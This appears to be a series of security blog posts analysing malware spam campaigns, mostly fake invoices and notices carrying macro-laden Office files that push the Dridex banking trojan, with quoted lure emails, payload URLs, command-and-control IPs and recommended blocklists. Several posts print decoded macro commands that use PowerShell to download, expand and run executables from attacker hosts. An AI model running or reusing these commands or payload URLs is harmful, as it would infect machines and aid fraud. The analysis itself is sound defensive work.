Malware spam: "Your 2015 Electronic IP Pin!" / "Internal Revenue Service [refund.noreply@irs.gov]"

This fake IRS email comes with a malicious attachment.

From:    Internal Revenue Service [refund.noreply@irs.gov]
Date:    6 March 2015 at 08:48
Subject:    Your 2015 Electronic IP Pin!

Dear Member

This is to inform you that our system has generated your new secured Electronic PIN to e-file your 2014 tax return.

Please kindly download the microsoft file to securely review it.

Thanks

Internal Revenue Service
915 Second Avenue, MS W180

So far I have only seen a single sample of this with an attachment TaxReport(IP_PIN).doc - although there are usually several different versions. Currently this is undetected by AV vendors. This contains a malicious macro [pastebin] which downloads a component from the following location:

http://chihoiphunumos.ru/js/bin.exe

There are probably other download locations, but the payload will be the same. This is saved as %TEMP%\324235235.exe and has a detection rate of 1/55. Automated analysis tools [1] [2] show attempted connections to:

92.63.87.13 (MWTV, Latvia)
95.163.121.200 (Digital Networks CJSC aka DINETHOSTING, Russia)
104.232.32.119 (Net3, US)
87.236.215.103 (OneGbits, Lithunia)

According to the Malwr report this executable drops another version of itself [VT 1/56] and a malicious DLL [VT 2/56].

Recommended blocklist:
92.63.82.0/23
92.63.84.0/22
92.63.88.0/24
95.163.121.0/24
104.232.32.119
87.236.215.103

Malware spam: "Bobby Drell [rob@abbottpainting.com]" / "Brochure2.doc"

This spam does not come from Bobby Drell or Abbott Painting, instead it is a simple forgery with a malicious attachment.

From:    Bobby Drell [rob@abbottpainting.com]
Date:    5 March 2015 at 10:27
Subject:    Brochure2.doc

Please change the year to 2015.
Please confirm receipt
Thanks
Bobby Drell

Attached is a file Brochure2.doc which has a low detection rate which contains this malicious macro [pastebin] which downloads a component from the following location:

http://data.gmsllp.com/js/bin.exe

This is saved as %TEMP%\324235235.exe. Note that there may be different versions of this document that download files from different locations, but the payload should be identical. In this case the executable has a detection rate of 4/57.

Automated analysis tools [1] [2] show it phoning home to the following IPs:

92.63.87.13 (MWTV, Latvia)
95.163.121.200 (Digital Networks aka DINETHOSTING, Russia)

Usually this will drop a malicious Dridex DLL, although I was not able to obtain a sample.

Recommended blocklist:
92.63.82.0/23
92.63.84.0/22
92.63.88.0/24
95.163.121.0/24

Malware spam: "John Donald [john@kingfishermanagement.uk.com]" / "Document1"

This rather terse email comes with a malicious attachment:

From:    John Donald [john@kingfishermanagement.uk.com]
Date:    4 March 2015 at 09:09
Subject:    Document1

There is no body text, but there is an attachment Document1.doc which is not currently detected by AV vendors, in turn it contains this malicious macro [pastebin] which downloads another component from the following location:

http://retro-moto.cba.pl/js/bin.exe

Note that there may be other different versions of this document with different download locations, but it should be an identical binary that is downloaded. This file is saved as %TEMP%\GHjkdjfgjkGKJ.exe and has a VirusTotal detection rate of 2/57.

Automated analysis tools [1] [2] show attempted network traffic to the following IPs:

92.63.87.13 (MWTV, Latvia)
104.232.32.119 (Net3, US)
87.236.215.103 (OneGbits, Lithunia)
108.61.198.33 (Gameservers.com / Choopa LLC, Netherlands)

According to the Malwr report it also drops another version of itself with a detection rate of just 1/57 plus a DLL with a detection rate of 7/56.

Recommended blocklist:
92.63.82.0/23
92.63.84.0/22
92.63.88.0/24
104.232.32.119
87.236.215.103
108.61.198.33

Malware spam: "Chris Christou [chris.christou@greysimmonds.co.uk]" / "Copy invoices"

This fake invoice spam comes with a malicious attachment:

From:    Chris Christou [chris.christou@greysimmonds.co.uk]
Date:    26 February 2015 at 10:45
Subject:    Copy invoices

Hello ,

Please find copy invoices attached as per our telephone conversation.

Kind regards,

Chris

Chris Christou
Credit Control
Grey Simmonds
Cranes Point
Gardiners Lane South
Basildon
Essex SS14 3AP
Tel:  0845 130 9070
Fax: 0845 370 9071
Email:  chris.christou@greysimmonds.co.uk
Web: www.greysimmonds.com

P  “Think before you Print” - Please consider the environment before printing this e-mail

It does NOT come from Grey Simmons, nor have their systems been compromised in any way. Instead, this is a simple forgery.

I have only seen one sample so far, with an attachment IGM135809.doc [detection rate 0/57] which contains this malicious macro [pastebin] which downloads a further component from:

http://xomma.net/js/bin.exe

This is saved as %TEMP%\GVhjJJVJH.exe and has a VirusTotal detection rate of 4/56. Automated analysis tools [1] [2] show it attempting to phone home to the following IPs:

92.63.87.13 (MWTV, Latvia)
78.140.164.160 (Webazilla, US)
86.104.134.156 (One Telecom, Moldova)
104.232.32.119 (Net 3, US)

This Malwr report shows dropped files with an MD5 of 590fc032ac747d970eb8818671f2bbd3 [VT 3/57] and 1997b0031ad702c8347267db0ae65539 [VT 4/57].

Recommended blocklist:
92.63.82.0/23
92.63.84.0/22
92.63.88.0/24
78.140.164.160
86.104.134.156
104.232.32.119

Malware spam: "Your LogMeIn Pro payment has been processed!"

This fake financial email does not come from LogMeIn, instead it has a malicious attachment:

From:    LogMeIn.com [no_reply@logmein.com]
Date:    25 February 2015 at 08:52
Subject:    Your LogMeIn Pro payment has been processed!

Dear client,

Thank you for purchasing our yearly plan for LogMeIn Pro on 25 computers.
Your credit card has been successfully charged.

Date : 25/2/2015
Amount : $999 ( you saved $749.75)



The transaction details can be found in the attached receipt.
Your computers will be automatically upgraded the next time you sign in.


Thank you for choosing LogMeIn!

Attached is a malicious Excel document called logmein_pro_receipt.xls with a VirusTotal detection rate of 0/56. Usually in a spam run like this there are several different versions of the document but so far I have only seen one, containing this malicious macro. The macro downloads a file from:

http://junidesign.de/js/bin.exe

This is saved as %TEMP%\GHjkdfg.exe and has a VirusTotal detection rate of 3/57. Automated analysis tools [1] [2] [3] show this calling home to the following IPs:

92.63.87.13 (MTWV, Latvia)
86.104.134.156 (One Telecom, Moldova)
217.12.203.34 (ITL, Bulgaria)
108.61.165.19 (Choopa LLC, Netherlands)
5.196.241.196 (OVH, Ireland)
66.110.179.66 (Microtech Tel, US)
202.44.54.5 (World Internetwork Corporation, Thailand)
95.163.121.179 (Digital Networks aka DINETHOSTING, Russia)
59.97.137.171 (Broadband Multiplay, India)
78.140.164.160 (Webazilla, US)
107.181.174.104 (Colo at 55, US / UA Servers, Ukraine)
I outlined some of the problems with MVTW in this post. The Malwr report shows that among other activities, this drops an executable that seems to be another version of itself [VT 3/57] and a malicious DLL which is probably a Dridex component [VT 4/57].

Recommended blocklist:
92.63.82.0/23
92.63.84.0/22
92.63.88.0/24
86.104.134.156
217.12.203.34
108.61.165.19
5.196.241.196
66.110.179.66
202.44.54.5
95.163.121.179
59.97.137.171
78.140.164.160
107.181.174.104

UPDATE:  a different version of the attachment [VT] uses this macro to download from:

http://jacekhondel.w.interia.pl/js/bin.exe

The payload is identical to the other variant.

Malware spam: "Berendsen UK Ltd Invoice 60020918 117" / "donotreply@berendsen.co.uk"

This fake invoice is not from Berendsen UK Ltd but is a simple forgery. They are not sending out the spam and their systems have not been compromised in any way. Instead, this email has a malicious Word document attached.

From:    donotreply@berendsen.co.uk
Date:    24 February 2015 at 08:09
Subject:    Berendsen UK Ltd Invoice 60020918 117

Dear Sir/Madam,

Please find attached your invoice dated 21st February.
All queries should be directed to your branch that provides the service. This detail can be found on your invoice.


Thank you.

___________________________________________________________
This e-mail and any attachments it may contain is confidential and
intended for the use of the named addressee(s) only. If you are not
the intended recipient, you have received it in error, please
immediately contact the sender and delete the material from your
computer system. You must not copy, print, use or disclose its
contents to any person. All e-mails are monitored for traffic data and
the content for security purposes.

Berendsen UK Ltd, part of the Berendsen plc Group.
Registered Office: 4 Grosvenor Place, London, SW1X 7DL.
Registered in England No. 228604

I have only seen one sample of this email, with a Word document IRN001549_60020918_I_01_01.doc which has a zero detection rate. Contained within this is malicious Word macro which downloads a component from the following location:

http://heikehall.de/js/bin.exe

This binary has a VirusTotal detection rate of 2/57. Automated analysis tools [1] [2] [3] show that it attempts to phone home to:

92.63.87.13 (MWTV, Latvia)
5.196.241.196 (OVH, Ireland)
66.110.179.66 (Microtech Tel, US)
202.44.54.5 (World Internetwork Corporation, Thailand)
78.140.164.160 (Webazilla, US)
31.160.233.212 (KPN, Netherlands)
185.14.30.98 (UA Servers, Ukraine)
86.104.134.156 (One Telecom, Moldova)

MWTV have featured several times on this blog. A close examination of their 92.63.80.0/20 block indicates a mix of legitimate and illegitimate sites, however the bad sites are concentrated in the following ranges:

92.63.82.0/23
92.63.84.0/22
92.63.88.0/24

In addition to this, the malware attempts to drop a Dridex DLL which is widely detected by AV vendors with a detection rate of 30/57.

Recommended blocklist:
92.63.82.0/23
92.63.84.0/22
92.63.88.0/24
5.196.241.196
66.110.179.66
202.44.54.5
78.140.164.160
31.160.233.212
185.14.30.98
86.104.134.156

Multiple spam emails using malicious XLS or XLSM attachment

I'm seeing multiple spam runs (probably pushing the Dridex banking trojan) with no body text, various subjects and either an XLS or XLSM attachment.

Example subjects include:
Copy [ID:15E376774] attaced
RE: Requests documentation [458C28133]
Request error [C3843]
Request error [FDF396530]
Requests documentation [242B035667]

Attachments look something similar to this:
15E376774.xlsm
242B035667.xlsm
458C28133.xls
C3843.xls
FDF396530.xlsm

The XLS and XLSM files are different structurally.. the XLSM files are basically an Office 2007 ZIP archive of all the data components, the XLS files are an old school Office 2003 file. Nevertheless, they contain a macro with 23 components to make it harder to analyse, although the important modules are Module 11 which contains the text string to decrypt, and Module 14 which contains the decryption function itself. Almost everything else is irrelevant.

Once the string is decrypted, it becomes fairly obvious what it going on. So far, there appear to be four strings with different download locations:

cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://5.196.243.7/kwefewef/fgdsee/dxzq.jpg','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;

cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://46.30.42.151/kwefewef/fgdsee/dxzq.jpg','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;

cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://176.31.28.235/kwefewef/fgdsee/dxzq.jpg','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;

cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://92.63.88.63/kwefewef/fgdsee/dxzq.jpg','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;

So, we can see a file dxzq.jpg being downloaded which is actually a CAB file (JIOiodfhioIH.cab) which is then expanded to JIOiodfhioIH.exe and then run.

For information, these IPs are hosted by:

5.196.243.7 (OVH, Ireland)
46.30.42.151 (Eurobtye LLC, Russia)
176.31.28.235 (OVH, France)
92.63.88.63 (MWTV, Latvia)

This executable has a detection rate of 4/56. Automated analysis [1] [2] [3] shows attempted network connections to:

82.151.131.129 (Doruknet, Turkey)
121.50.43.175 (Tsukaeru.net, Japan)
74.208.68.243 (1&1, US)

The Malwr report shows that it also drops a DLL with a detection rate of just 1/56.

Recommended blocklist:
82.151.131.129
121.50.43.175
74.208.68.243
5.196.243.7
46.30.42.151
176.31.28.235
92.63.88.63

For research purposes, a copy of the files analysed and dropped can be found here, password is infected

Something evil on 92.63.88.0/24 (MWTV, Latvia)

I've been tracking Dridex for some time, and I keep seeing IPs for MWTV in Latvia cropping up. So far I have seen:

92.63.88.87
92.63.88.97
92.63.88.100
92.63.88.105
92.63.88.106
92.63.88.108

I'm not sure how widely this spreads through the MWTV network, but I would certainly recommend blocking 92.63.88.0/24 on your network perimeter.

Malware spam: "AR.Support@efi.com" / "Customer statement 0001031389 as on 02/05/2015"

This fake financial document has a malicious attachment:

From:    AR.Support@efi.com
To:    minutemanpresschicago@comcast.net
Date:    17 February 2015 at 10:22
Subject:    Customer statement 0001031389 as on 02/05/2015

Dear EFI Customer,


Please find attached your statement for this month. If you need invoice
copies or have any questions you can reply to this e mail and we will
contact you at the earliest.


Regards,
AR Support
AR.Support@efi.com


** Attention AP Department ** Effective April 25th our new remittance address will change to
the following. Please update your records. Thank you.

PO Box 742366
Los Angeles, CA. 90074-2366

Confidentiality notice: This message may contain confidential information. It is intended only for the person to whom it is addressed. If you are not that person, you should not use this message. We request that you notify us by replying to this message, and then delete all copies including any contained in your reply. Thank you.

Attached is a Word document Customer statement 0001031389 as on 02052015.DOC which comes in two different types with zero detection rates [1] [2] containing two highly obfuscated modular macros [1] [2]  that actually just perform a ROT13 transformation on a couple of strings.

uggc://zjpbq4.pon.cy/wf/ova.rkr
uggc://nyhpneqban.pbz/wf/ova.rkr

Which decodes to:

http://mwcod4.cba.pl/js/bin.exe
http://alucardona.com/js/bin.exe

This has a VirusTotal detection rate of 5/57. Automated analysis tools [1] [2] [3] shows the malware attempting to connect to:

202.44.54.5 (World Internetwork Corporation, Thailand)
66.110.179.66 (Microtech Tel, US)
92.63.88.105 (MWTV, Latvia)

According to the Malwr report this drops a DLL with a detection rate of 2/57 which is probably Dridex.

Recommended blocklist:
202.44.54.5
66.110.179.66
92.63.88.105

Malware spam: "Unpaid invoice [ID:9876543210]" drops Dridex

This fake invoice comes with no body text, a random ID: in the subject and a randomly-named malicious Excel attachment

Date:    17 February 2015 at 14:05
Subject:    Unpaid invoice [ID:9876543210]

Some example attachment names are:

3356201778.xls
5EABA06572.xls
6F5FE56048.xls
A6AA331555.xls
B2D4C97246.xls
C9E5445852.xls

There are found different variants, all with very low detection rates at VirusTotal [1] [2] [3] [4]. Each one contains a different variety of macros, and unlike previous spam runs, these are individual modules (which frankly makes it no harder to analyse, just harder to put into Pastebin).

When we decrypt the strings in the macro, we see:

cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://78.129.153.27/sdeoefefs/dfssk.cab','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;

cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://92.63.88.87/sdeoefefs/dfssk.cab','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;

cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://62.76.43.194/sdeoefefs/dfssk.cab','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;

cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://46.4.232.206/sdeoefefs/dfssk.cab','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;

This combines the recent Powershell trick with a new one. Instead of downloading an EXE file, it downloads and unpacks a CAB file, dfssk.cab which is saved in the %TEMP% folder and then expanded to %TEMP%\JIOiodfhioIH.exe.

These download locations are:
92.63.88.87 (MWTV, Latvia)
78.129.153.27 (iomart, UK)
62.76.43.194 (IT House / Clodo-Cloud, Russia)
46.4.232.206 (Hetzner, Germany / Dmitry Zheltov, Russia)

Automated analysis tools [1] [2] [3] show this POSTing to 92.63.88.97 (MWTV,  Latvia), which is definitely worth blocking. Note that one of the download locations for the binary is only a few IPs away at  92.63.88.87.

ThreatExpert also shows attempted network connections to 92.63.88.97 plus:
136.243.237.194 (Hetzner, Germany)
74.208.68.243 (1&1, US)

This Malwr report shows a DLL with MD5 b83b18ffe375fad452c02bdf477864fe which has a VirusTotal detection rate of 3/57.

Recommended blocklist:
92.63.88.97
92.63.88.87
78.129.153.27
62.76.43.194
46.4.232.206
136.243.237.194
74.208.68.243

Malware spam: "Re: Data request [ID:91460-2234721]" / "Copy of transaction"

This rather terse spam comes with a a malicious attachment:

From: Rosemary Gibbs
Date:    16 February 2015 at 10:12
Subject:    Re: Data request [ID:91460-2234721]

Copy of transaction.

The sender's name, the ID: number and the name of the attachment vary in each case. Example attachment names are

869B54732.xls
BE75129513.xls
C39189051.xls

None of the three attachments are detected by anti-virus vendors [1] [2] [3]. They each contain a slightly different macro [1] [2] [3]. The critical part of the encoded macro looks like this (click to enlarge):

It's quite apparent that this is ROT13 encoded which you can easily decrypt at rot13.com rather than working through the macro. These three samples give us:

"cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://85.143.166.140/fdhtepopdhd/sfbwurwfl/wyxbdf.exe','%TEMP%\JIOiodfhioIH.exe');Start-Process '%TEMP%\JIOiodfhioIH.exe';" 

"cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://92.63.88.104/fdhtepopdhd/sfbwurwfl/wyxbdf.exe','%TEMP%\JIOiodfhioIH.exe');Start-Process '%TEMP%\JIOiodfhioIH.exe';" 

"cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://5.196.175.140/fdhtepopdhd/sfbwurwfl/wyxbdf.exe','%TEMP%\JIOiodfhioIH.exe');Start-Process '%TEMP%\JIOiodfhioIH.exe';"

So, these macros are attempting to use Powershell to download and execute the next step (possibly to avoid the UAC popup). The downloaded binary has a VirusTotal detection rate of 3/57 and automated analysis tools [1] [2] [3] show attempted communications with:

85.143.166.72 (Pirix, Russia)
205.185.119.159 (FranTech Solutions, US)
92.63.88.87 (MWTV, Latvia)
173.226.183.204 (TW Telecom, Taiwan)
27.5.199.115 (Hathway Cable and Datacom, India)
149.171.76.124 (University Of New South Wales, Australia)
46.19.143.151 (Private Layer, Switzerland)

It also drops a DLL with a 4/57 detection rate which is the same malware seen in this attack.

Recommended blocklist:
85.143.166.72
205.185.119.159
92.63.88.87
173.226.183.204
27.5.199.115
149.171.76.124
46.19.143.151

Malware spam: "Remittance XX12345678"

This spam comes from randomly-named companies, with slightly different body text and different subject in each case. Here is an example:

From:    Gale Barlow
Date:    13 February 2015 at 12:30
Subject:    Remittance IN56583285

Dear Sir/Madam,

I hope you are OK. I am writing you to let you know that total amount specified in the contract has been paid into your bank account on the 12th of February at 15:25 via BACS payment system and should reach the destination (beneficiary's) account within 3 working days.
To see full payment details please refer to the remittance advice note attached to the letter.

Any queries? Please reply back with your questions and you will receive a prompt and qualitative response as soon as possible. Please do not hesitate to write us.

Gale Barlow
Accounts Manager
4D PHARMA PLC


Boyd Huffman
Accounts Payable
GETECH GROUP 

There is a malicious Word document attached to the email, so far I have only seen one version of this but usually there are two or more. The document itself has a low detection rate of 1/57 and it contains a malicious macrowhich downloads a file from the following location:

http://62.76.188.221/aksjdderwd/asdbwk/dhoei.exe

This is saved as %TEMP%\dsHHH.exe and has a detection rate of 7/57, identifed as a Dridex downloader. Automated analysis tools [1] [2] [3] [4] show a variety of activities, including communications with the following  IPs:

85.143.166.72 (Pirix, Russia)
46.19.143.151 (Private Layer, Switzerland)
193.206.162.92 (Universita degli Studi dell'Insubria, Italy)
92.63.88.87 (MWTV, Latvia)
78.129.153.18 (iomart, UK)
205.185.119.159 (Frantech Solutions, US)
The malware then drops a Dridex DLL with a detection rate of 3/52  and mysteriously drops another Dridex downloader with a detection rate of 6/57. The Malwr report for that indicates there is some attempting traffic to nonexistent domains.

Recommended blocklist:
85.143.166.72
46.19.143.151
193.206.162.92
92.63.88.87
78.129.153.18
205.185.119.159

Something evil on 146.185.213.69 and probably the whole /24

146.185.213.69 caught my eye, hosting a number of "ads." subdomains, many of which are tagged by Google as being malicious (highlighted below)

ads.warmsanieren.de
ads.coaching-baum.de
ads.fatmansempire.de
ads.marktluecke-berlin.de
ads.xn--hoffmnsche-u5a.de
ads.lagu.la
ads.lad-consult.lu
ads.reachcms.co.uk
ads.martinwguy.co.uk
ads.ukbizrooms.co.uk
ads.ajcqualityassurance.co.uk
ads.warmsanieren.de
ads.coaching-baum.de
ads.fatmansempire.de
ads.marktluecke-berlin.de
ads.xn--hoffmnsche-u5a.de
ads.lagu.la
ads.lad-consult.lu
ads.reachcms.co.uk
ads.martinwguy.co.uk
ads.ajcqualityassurance.co.uk
ads.ukbizrooms.co.uk
ads.cto.lu
ads.hoa.lu
ads.blackcockinn.co.uk
ads.loumacfitness.co.uk
ads.cto.lu
ads.hoa.lu
ads.blackcockinn.co.uk
ads.loumacfitness.co.uk

Well, you can probably assume that all those domains are malicious (even without the ads. prefix). But a look at the IP address range was revealing:

inetnum:        146.185.213.0 - 146.185.213.255
netname:        Customer-Valyalov-net
descr:          net for user Valyalov (hosting and VPS)
country:        RU
admin-c:        VME12-RIPE
tech-c:         VME12-RIPE
status:         ASSIGNED PA
mnt-by:         MNT-PIN
mnt-routes:     LIPATOV-MNT
source:         RIPE # Filtered

person:         Valyalov Mikhail Evgenyevich
address:        Sankt-Petersburg, Volynski per., d. 2, lit. A, pom. 12N
phone:          +79099740171
nic-hdl:        VME12-RIPE
mnt-by:         VEROX-MNT
source:         RIPE # Filtered

route:          146.185.213.0/24
descr:          Valyalov-Net @ RN-Data/AltNet datacenter
origin:         AS41390
mnt-by:         LIPATOV-MNT
source:         RIPE # Filtered

The block is owned by RN Data SIA of Latvia and suballocated to somebody in St Petersburg by the name of  Mikhail Evgenyevich Valyalov. RN Data are one of those hosts that have hosted malware in the past, and I tend to lean towards blocking them.

A look at the other contents of the /24 appear [csv] to indicate further suspicious activity, especially f528764d624db129b32c21fbca0cb8d6.com on 146.185.213.53 (mentioned here plus several other places).

So, frankly this entire /24 looks like it is being used for evil purposes at the moment and I recommend that you block it, plus these following domains:

man.liborcartel.com
letter.liborscam.com
kick.lmfho.co.uk
kiss.mbnappiclaim.co.uk
impulse.nrgcard.co.uk
increase.olympicclaims.co.uk
history.parkingclaims.co.uk
heat.onlinefuelcard.co.uk
hole.parkingclaims.com
33db9538.com
54dfa1cb.com
blue.azhealthlawblog.com
board.milliganlawless.com
body.phoenixhealthlaw.com
blow.arizonahealthlawyers.com
exchange.phoenixhealthlawyers.com
boat.milliganlawlesstaylormurphybailey.com
regentimpaired.com
revealedattached.com
f528764d624db129b32c21fbca0cb8d6.com
warmsanieren.de
coaching-baum.de
fatmansempire.de
marktluecke-berlin.de
xn--hoffmnsche-u5a.de
lagu.la
lad-consult.lu
reachcms.co.uk
martinwguy.co.uk
ukbizrooms.co.uk
ajcqualityassurance.co.uk
cto.lu
hoa.lu
blackcockinn.co.uk
loumacfitness.co.uk
ellis-fuhr.us

Malware sites to block 18/4/13, revisited

Quite late last night I posted some malicious IP address that I recommend blocking. I've had a chance to look at these more deeply, and some of them are in known bad IP ranges that you should consider blocking.

Most of these IP ranges are in Russia, blocking them will probably block some legitimate sites. If you don't do much business with Russia then it will probably not be an issue, if you do then you should exercise caution. There's a plain list at the bottom if you simply want to copy-and-paste.

Detected IP	Recommended block	Owner
5.9.191.179	5.9.191.160/26	(CyberTech LLC, Russia / Hetzner, Germany)
5.45.183.91	5.45.183.91	(Bradler & Krantz, Germany)
5.135.67.215	5.135.67.208/28	(MMuskatov-IE / OVH, France)
5.135.67.217
23.19.87.38	23.19.87.32/29	(Di & Omano Ltd, Germany / Nobis Technology, US)
37.230.112.83	37.230.112.0/23	(TheFirst-RU, Russia)
46.4.179.127	46.4.179.64/26	(Viacheslav Krivosheev, Russia / Hetzner Germany)
46.4.179.129
46.4.179.130
46.4.179.135
46.37.165.71	46.37.165.71	(BurstNET, UK)
46.37.165.104	46.37.165.104	(BurstNET, UK)
46.105.162.112	46.105.162.112/26	(Shah Sidharth, US / OVH, France)
62.109.24.144	62.109.24.0/22	(TheFirst-RU, Russia)
62.109.26.62
62.109.27.27
80.67.3.124	80.67.3.124	(Portlane Networks, Sweden)
80.78.245.100	80.78.245.0/24	(Agava JSC, Russia)
91.220.131.175	91.220.131.0/24	(teterin Igor Ahmatovich, Russia)
91.220.131.178
91.220.163.24	91.220.163.0/24	(Olevan plus, Ukraine)
94.250.248.225	94.250.248.0/23	(TheFirst-RU, Russia)
108.170.4.46	108.170.4.46	(Secured Servers, US)
109.235.50.213	109.235.50.213	(xenEurope, Netherlands)
146.185.255.97	146.185.255.0/24	(Petersburg Internet Network, Russia)
146.185.255.207
149.154.64.161	149.154.64.0/23	(TheFirst-RU, Russia)
149.154.65.56
149.154.68.145	149.154.68.0/23	(TheFirst-RU, Russia)
173.208.164.38	173.208.164.38	(Wholesale Internet, US)
173.234.239.168	173.234.239.160/27	(End of Reality LLC, US / Nobis, US)
176.31.191.138	176.31.191.138	(OVH, France)
176.31.216.137	176.31.216.137	(OVH, France)
184.82.27.12	184.82.27.12	(Prime Directive LLC, US)
188.93.211.57	188.93.210.0/23	(Logol.ru, Russia)
188.120.238.230	188.120.224.0/20	(TheFirst-RU, Russia)
188.120.239.132
188.165.95.112	188.165.95.112/28	(Shah Sidharth, US / OVH France)
188.225.33.62	188.225.33.0/24	(Transit Telecom, Russia)
188.225.33.117
192.210.223.101	192.210.223.101	(VPS Ace, US / ColoCrossing, US)
193.106.28.242	193.106.28.242	(Centr Informacionnyh Technologii Online, Ukraine)
193.169.52.144	193.169.52.0/23	(Promobit, Russia)
195.3.145.99	195.3.145.99	(RN Data, Latvia)
195.3.147.150	195.3.147.150	(RN Data, Latvia)
198.23.250.142	198.23.250.142	(LiquidSolutions, Bulgaria / ColoCrossing, US)
198.46.157.174	198.46.157.174	(Warfront Cafe LLC, US / ColoCrossing, US)
205.234.204.151	205.234.204.151	(HostForWeb, US)
205.234.204.190	205.234.204.190	(HostForWeb, US)
205.234.253.218	205.234.253.218	(HostForWeb, US)
213.229.69.40	213.229.69.40	(Poundhost, UK / Simply Transit, UK)

5.9.191.160/26
5.45.183.91
5.135.67.208/28
23.19.87.32/29
37.230.112.0/23
46.4.179.64/26
46.37.165.71
46.37.165.104
46.105.162.112/26
62.109.24.0/22
80.67.3.124
80.78.245.0/24
91.220.131.0/24
91.220.163.0/24
94.250.248.0/23
108.170.4.46
109.235.50.213
146.185.255.0/24
149.154.64.0/23
149.154.68.0/23
173.208.164.38
173.234.239.160/27
176.31.191.138
176.31.216.137
184.82.27.12
188.93.210.0/23
188.120.224.0/20
188.165.95.112/28
188.225.33.0/24
192.210.223.101
193.106.28.242
193.169.52.0/23
195.3.145.99
195.3.147.150
198.23.250.142
198.46.157.174
205.234.204.151
205.234.204.190
205.234.253.218
213.229.69.40

"Support Center" spam / phticker.com

Not malware this time, but this fake "Support Center" spam leads to a fake pharma site at phticker.com:

Date:      Mon, 11 Feb 2013 06:13:52 -0700
From:      "Brinda Wimberly" [noreply@mdsconsulting.be]
Subject:      Support Center

    Welcome to Help Support Center

Hello,

You have been successfully registered in our Ticketing System

Please, login and check status of your ticket, or report new ticket here

See All tickets
   
Go To Profile

This message was sent to [redacted]. Should you have any questions, or if you believe that you have received this in error please contact us at support center.

The site appears to be clean from a malware perspective and is hosted on 171.25.190.246 (Verus AS, Latvia) along with these other fake pharma sites:

nislevitra.com
tablethealthipad.com
tivozanibkimedicine.com
marijuanarxmedicine.com
drugstorepharmacycenterline.com
medicalwelhealthcare.com
physicianslnesshealth.com
newhealthpharm.com
gokeyscan.com
medpillsprescription.com
wichigenerics.com
boschmeds.com
pillcarney.com
healthviagraobesity.com
pharmedicinehat.net
rxlevitrainc.eu
tabletdrugipad.eu
pillsphysicpharma.ru
xree.ru
lxie.ru
zeap.ru
tabspharmacytablets.ru
pillsmedicalsrx.ru
poey.ru
ongy.ru
phticker.com

IMDB "Your password is too weak" spam / thepharmhealth.com

This spam leads to a fake pharma site at thepharmhealth.com:

Date:      Sat, 9 Jun 2012 18:20:35 -0700 (PDT)
From:      IMDb User Protection [do-not-reply-here@imdb.com]
Subject:      Your password is too weak

This is an automatic message from the Internet Movie Database (IMDb) registration system.
Our system detected your password is too weak. Short passwords are easy to guess.

Please follow this link :

https://secure.imdb.com/password_update/imdb/74129625140408804050

If you used your IMDb password at any other sites, you'll need to change those passwords as well.

Regards,
IMDb User Protection help
http://imdb.com/register/

It's an interesting and novel approach, and it could easily be adapted for malware rather than fake prescriptions. thepharmhealth.com is hosted on 80.232.131.201 (SIA Lattelecom, Latvia).

"Amazon.com Password Assistance" spam / healthcarewelbizness.com

The fake pill pushers are getting inventing, this spam leads to a fake pharma site on healthcarewelbizness.com :

Date:      Fri, 27 Apr 2012 04:47:10 +0000 (UTC)
From:      "Amazon.com" [account-update@amazone.com]
Subject:      Amazon.com Password Assistance

We received a request to reset the password associated with this e-mail address. Please follow the instructions below.

Click the link below to complete or cancel request using our secure server:

https://www.amazon.com/ap/forgotpassword?arb=cf4c17ba-4659-06c6-ff0f-58f6e8b50a66

If clicking the link doesn't seem to work, you can copy and paste the link into your browser's address window, or retype it there.

Amazon.com will never e-mail you and ask you to disclose or verify your Amazon.com password, credit card, or banking account number. Thanks for visiting Amazon.com!

healthcarewelbizness.com is hosted on 46.183.216.215 (Dataclub, Latvia) along with a whole load of other toxic websites that are best avoided.

NACHA Spam / evrymonthnighttry.com and glasseseverydaynow.com

More NACHA themed spam this morning that redirects victims through a hacked legitimate site to a malware laden page, this time hosted on evrymonthnighttry.com or glasseseverydaynow.com.

These sites are hosted on 46.183.217.119 (Dataclub, Latvia). I can't see anything at all of value in 46.183.216.0/21 so blocking access to all of that range might be prudent.

It also attempts to load an exploit from a site called bbb-complains.org which is not resolving at present.

A couple of example emails:

Date:      Thu, 15 Dec 2011 07:42:51 +0000
From:      "risk.manager@nacha.org" [risk.manager@nacha.org]
Subject:      Your ACH transaction details

Attention: Accounting Department

This message includes an important information regarding the ACH debit transfer sent on your behalf, that was detained by our bank:
Transaction ID:    079788807282357
Transaction status:    pending

In order to resolve this matter, please use the link below to review the transaction details as soon as possible.

Yours faithfully,
Anthony Cooley
Chief Accountant

and

Date:      Thu, 15 Dec 2011 07:30:43 +0000
